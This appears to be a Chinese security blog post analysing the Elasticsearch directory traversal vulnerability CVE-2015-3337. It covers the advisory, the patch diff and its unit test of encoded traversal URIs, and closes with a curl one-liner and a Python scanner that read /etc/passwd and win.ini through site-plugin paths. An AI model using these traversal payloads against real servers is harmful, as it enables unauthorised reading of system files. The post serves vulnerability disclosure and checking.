Elasticsearch 任意文件读取漏洞(CVE-2015-3337)

2015-05-13 15,275

elasticsearch又出新版本了,这次修复了一个任意文件读取漏洞(写的是目录遍历)。

Elasticsearch

           https://www.elastic.co/community/security
CVE-2015-3337
All Elasticsearch versions prior to 1.5.2 and 1.4.5 are vulnerable to a directory traversal attack that allows an attacker to retrieve files from the server running Elasticsearch when one or more site plugins are installed, or when Windows is the server OS.
Users should upgrade to 1.4.5 or 1.5.2. Users that do not want to upgrade can address the vulnerability by disabling site plugins. See the CVE description for additional options.

elasticsearch

 

官方的release notes:

1
在这里看描述:https://github.com/elastic/elasticsearch/pull/10815
在这里看漏洞详情:https://github.com/spinscale/elasticsearch/commit/5d8e9e24c917b5f2c0958ba68be34a42efaeadbc

原来代码是:

1if (!Files.exists(file) || Files.isHidden(file)) {

 

修改后加了验证

if (!Files.exists(file) || Files.isHidden(file) || !file.toAbsolutePath().normalize().startsWith(siteFile.toAbsolutePath())) {

 

@Test

/**
+     * Test normalizing of path
+     */
+    @Test
+    public void testThatPathsAreNormalized() throws Exception {
+        // more info: https://www.owasp.org/index.php/Path_Traversal
+        List<String> notFoundUris = new ArrayList<>();
+        notFoundUris.add("/_plugin/dummy/../../../../../log4j.properties");
+        notFoundUris.add("/_plugin/dummy/../../../../../%00log4j.properties");
+        notFoundUris.add("/_plugin/dummy/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%aflog4j.properties");
+        notFoundUris.add("/_plugin/dummy/%2E%2E/%2E%2E/%2E%2E/%2E%2E/index.html");
+        notFoundUris.add("/_plugin/dummy/%2e%2e/%2e%2e/%2e%2e/%2e%2e/index.html");
+        notFoundUris.add("/_plugin/dummy/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2findex.html");
+        notFoundUris.add("/_plugin/dummy/%2E%2E/%2E%2E/%2E%2E/%2E%2E/index.html");
+        notFoundUris.add("/_plugin/dummy/..\\..\\..\\..\\..\\log4j.properties");
+
+        for (String uri : notFoundUris) {
+            HttpResponse response = httpClient().path(uri).execute();
+            String message = String.format(Locale.ROOT, "URI [%s] expected to be not found", uri);
+            assertThat(message, response.getStatusCode(), equalTo(RestStatus.NOT_FOUND.getStatus()));
+        }
+
+        // using relative path inside of the plugin should work
+        HttpResponse response = httpClient().path("/_plugin/dummy/dir1/../dir1/../index.html").execute();
+        assertThat(response.getStatusCode(), equalTo(RestStatus.OK.getStatus()));
+        assertThat(response.getBody(), containsString("<title>Dummy Site Plugin</title>"));
+    }

 

最后会这样被调用:

try {
            byte[] data = Files.readAllBytes(file);
            channel.sendResponse(new BytesRestResponse(OK, guessMimeType(sitePath), data));
        } catch (IOException e) {
            channel.sendResponse(new BytesRestResponse(INTERNAL_SERVER_ERROR));
        }

 

JDK7的Files把一个文件的内容读取后返回给客户端.
这里详情在:https://github.com/spinscale/elasticsearch/blob/5d8e9e24c917b5f2c0958ba68be34a42efaeadbc/src/main/java/org/elasticsearch/http/HttpServer.java

利用代码:curl http:// ip /_plugin/head/../../../../../../etc/passwd,注意curl版本

安全脉搏检查脚本

#!/usr/bin/env python
#-*- coding:utf-8 -*-
#-*- www.SecPulse.com-*-

import requests



def elastic_directoryTraversal(host,port):
 pluginList = ['test','kopf', 'HQ', 'marvel', 'bigdesk', 'head']

 pList = ['/../../../../../../../../../../../../../../etc/passwd','/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd','/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini']
 for p in pluginList:
 for path in pList:
 urlA = "http://%s:%d/_plugin/%s%s" % (host,port,p,path)
 try:
 content = requests.get(urlA,timeout=5,allow_redirects=True,verify=False).content
 if "/root:/" in content:
 print 'Elasticsearch 任意文件读取漏洞(CVE-2015-3337) Found!'
 except Exception,e:
 print e
 
elastic_directoryTraversal(host,port)

elasticsearch相关漏洞:

elasticsearch远程代码执行漏洞(CVE-2014-3120)

ElasticSearch Groovy脚本远程代码执行漏洞分析(CVE-2015-1427) (附exp)&  ElasticSearch 远程代码执行漏洞分析(CVE-2015-1427)&高级利用方法

Elasticsearch 任意文件读取漏洞(CVE-2015-3337)

elasticsearch river未授权访问可泄漏数据库配置信息

【来源: Elasticsearch 任意文件读取漏洞(CVE-2015-3337) 作者:园长MM  安全脉搏SP主编整理发布】

本文作者:SecPulse

本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/6557.html

Tags:
评论  (0)
快来写下你的想法吧!

SecPulse

文章数:98 积分: 289

气质和实力并兼的男人

安全问答社区

安全问答社区

脉搏官方公众号

脉搏公众号